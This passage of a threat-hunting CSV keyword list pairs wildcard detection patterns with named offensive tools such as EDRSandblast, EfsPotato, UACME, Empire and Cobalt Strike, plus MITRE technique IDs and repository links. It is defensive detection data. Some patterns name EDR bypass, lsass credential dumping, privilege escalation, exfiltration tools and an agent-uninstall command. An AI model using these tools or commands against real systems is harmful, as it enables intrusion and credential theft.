without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast_LsassDump.exe*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast_StaticLibrary*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*EDRSandblast-GodFault*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast-master*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*EEC35BCF-E990-4260-828D-2B4F9AC97269*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" +"*eeddce39694b2f054aa86a7c37b2b56427209f775d27438a9427410550a2740b*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*eeriedusk/nysm*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation 
tools","https://github.com/eeriedusk/nysm","1","1","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*ef1b18997ea473ac8d516ef60efc64b9175418b8f078e088d783fdaef2544969*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*EfsPotato-*.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*EfsPotato*efsrpc*","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","613","114","2023-06-01T15:03:53Z","2021-07-26T21:36:16Z" +"*EfsPotato*lsarpc*","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","613","114","2023-06-01T15:03:53Z","2021-07-26T21:36:16Z" +"*EfsPotato*lsarpc*","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with 
SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","613","114","2023-06-01T15:03:53Z","2021-07-26T21:36:16Z" +"*EfsPotato*lsass*","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","613","114","2023-06-01T15:03:53Z","2021-07-26T21:36:16Z" +"*EfsPotato*netlogon*","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","613","114","2023-06-01T15:03:53Z","2021-07-26T21:36:16Z" +"*EfsPotato*samr*","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","613","114","2023-06-01T15:03:53Z","2021-07-26T21:36:16Z" +"*EfsPotato-main*","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","613","114","2023-06-01T15:03:53Z","2021-07-26T21:36:16Z" +"*egblhcjfjmbjajhjhpmnlekffgaemgfh*","greyware_tool_keyword","Fornex VPN","External VPN usage within coporate network","T1090.003 - T1133 - 
T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*EgeBalci/amber@latest*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*EggShell.py*","offensive_tool_keyword","Eggshell","EggShell is a post exploitation surveillance tool written in Python. It gives you a command line session with extra functionality between you and a target machine. EggShell gives you the power and convenience of uploading/downloading files. tab completion. taking pictures. location tracking. shell command execution. persistence. escalating privileges. password retrieval. and much more. This is project is a proof of concept. 
intended for use on machines you own","T1027 - T1553 - T1003 - T1059 - T1558.001","TA0002 - TA0006 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/neoneggplant/EggShell","1","1","N/A","N/A","10","1563","404","2021-03-25T22:04:52Z","2015-07-02T16:58:30Z" +"*Egress-Assess Exfil Data*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","email subject","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*Egress-Assess Report*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*Egress-Assess transfer share*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*EgressAssess With Attachment*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","email 
body","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*Egress-Assess.*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*EgressAssess.ps1*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*Egress-Assess-master*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*egressbuster*","offensive_tool_keyword","egressbuster","EgressBuster is a way to test the effectiveness of egress filtering for an individual area. When performing a penetration test. often times companies leverage egress filtering in order to prevent access to the outside Internet. 
Most companies have special exceptions and allow ports but they may be difficult to find.","T1046 - T1570 - T1590","TA0001 - TA0007","N/A","N/A","Exploitation tools","https://github.com/trustedsec/egressbuster","1","1","N/A","N/A","4","327","104","2021-02-17T00:54:07Z","2015-05-14T02:19:26Z" +"*egresscheck-framework*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-EgressCheck.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 
+"*ehbhfpfdkmhcpaehaooegfdflljcnfec*","greyware_tool_keyword","WeVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*eidnihaadmmancegllknfbliaijfmkgo*","greyware_tool_keyword","Push VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*ejabberd2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ejkaocphofnobjdedneohbbiilggdlbi*","greyware_tool_keyword","Hotspot Shield Elite VPN Proxy","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*elastic-agent.exe uninstall*","greyware_tool_keyword","elastic-agent","uninstall elast-agent from the system","T1562.004 - T1070.004","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","6","8","N/A","N/A","N/A","N/A" +"*eldraco/domain_analyzer*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain 
by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","1","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" +"*electrum2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*elevate juicypotato *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*elevate Printspoofer*","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt 
Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crisprss/PrintSpoofer","1","0","N/A","10","10","76","8","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z" +"*elevate svc-exe *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 
- TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*ElevatePrivs*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*elevationstation.cpp*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*elevationstation.exe*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*elevationstation.git*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*elevationstation.sln*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*elevationstation-main*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*ElevenPaths*FOCA*","offensive_tool_keyword","FOCA","FOCA is a tool used mainly to find metadata and hidden information in the documents it scans. These documents may be on web pages. and can be downloaded and analysed with FOCA.It is capable of analysing a wide variety of documents. with the most common being Microsoft Office. Open Office. or PDF files. although it also analyses Adobe InDesign or SVG files. for instance.","T1556 - T1566 - T1213 - T1212 - T1565","TA0005 - TA0009","N/A","N/A","Information Gathering","https://github.com/ElevenPaths/FOCA","1","0","N/A","N/A","10","2495","518","2022-12-08T09:31:55Z","2017-10-02T17:05:06Z" +"*ELFLoader.c*","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. 
The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","204","40","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" +"*ELFLoader.h*","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. 
The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","204","40","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" +"*ELFLoader.out*","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. 
The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","204","40","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" +"*elite-proxy-finder*","offensive_tool_keyword","elite-proxy-finder","Finds elite anonymity (L1) HTTP proxies then tests them all in parallel. Tests each proxy against 3 IP checking URLs including one which is HTTPS to make sure it can handle HTTPS requests. Then checks the proxy headers to confirm its an elite L1 proxy that will not leak any extra info. By default the script will only print the proxy IP. request time. 
and country code of proxies that pass all four tests but you can see all the results including errors in any of the tests with the -a (--all) option.","T1586.001 - T1041.002 - T1105.002 - T1573.001 - T1135.002 - T1134.002 - T1016.001","TA0011 - TA0010 - TA0005 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/DanMcInerney/elite-proxy-finder","1","1","N/A","N/A","3","247","106","2016-11-23T10:31:33Z","2014-04-17T11:23:20Z" +"*emailall.py -*","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","6","6","577","101","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" +"*emailall.py check*","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - 